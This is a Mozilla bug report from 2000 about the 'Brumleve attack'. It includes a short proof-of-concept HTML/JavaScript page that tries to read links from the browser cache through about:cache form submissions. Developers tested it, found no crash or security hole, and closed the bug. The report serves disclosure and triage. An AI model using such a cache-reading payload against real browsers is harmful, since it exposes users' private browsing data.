Closed Bug 34456 Opened 25 years ago Closed 25 years ago

Brumleve attack locks up Moz

Categories

(Core :: Security, defect, P3)

Product:
Core
Component:
Security
Platform:
All
Windows NT
Type:
defect

Tracking

()

Status:
VERIFIED WORKSFORME

People

(Reporter: junruh, Assigned: security-bugs)

References

(
URL
)

Details

1) Run the above URL. Code is below. What happens: Windows - Moz locks up. Linux - the user is asked to save a file getLink.js, but otherwise appears unaffected. <title>Cache-Cow 4.07 (activated)</title> If the attack is successful, you will see a link from your cache displayed in an alert. Otherwise you should get a JavaScript error (you will need to open the javascript console to see it). <script> var slave; var data = ""; function launch() { slave = window.open("javascript:void(0)", "slave"); document.f.submit(); document.g.submit(); } function show() { document.g.urls.value = data; document.g.submit(); } </script> <body onLoad="launch()"> <base href="about:"> <form action="cache" method="post" name=f target=slave> <input type=submit></form> <form action="http://junruh/jstests/getLink.js" name=g target=slave> <input type=submit></form> </body>
--> phil - working the same on NT as reported on Linux, could you try a recent build there and see what's happening. I don't know if being asked to save the file is not a security issue, and if it's not crashing we could move the bug to security instead.
Assignee: rogerl → pschwartau
Using Windows and Linux debug builds from 05/29/00 - In the Windows build, Moz does not lock up on the given URL. Instead, I get the prompt asking me to save the file getLink.js - the behavior the reporter describes for Linux. On Linux, however, I do not get a prompt to save the file. I just get an empty child window of the parent window. The child window has no URL showing. In the debug window we see "Error loading URL http://junruh/jstests/cache". I am unable to bring up the JavaScript console at all when this happens. I could close this bug, because Moz is not locking up on Windows as originally reported. However, could Security please review this? I don't understand Security issues enough to understand what the Brumleve attack is, and whether the behavior we are seeing now is acceptable. Thank you -
Assignee: pschwartau → mstoltz
Component: Javascript Engine → Security: General
QA Contact: pschwartau → czhang
I don't see any errant behavior or crash here, marking WORKSFORME.
Status: NEW → RESOLVED
Closed: 25 years ago
Resolution: --- → WORKSFORME
I don't see unsecure thing either.
Status: RESOLVED → VERIFIED
You need to log in before you can comment on or make changes to this bug.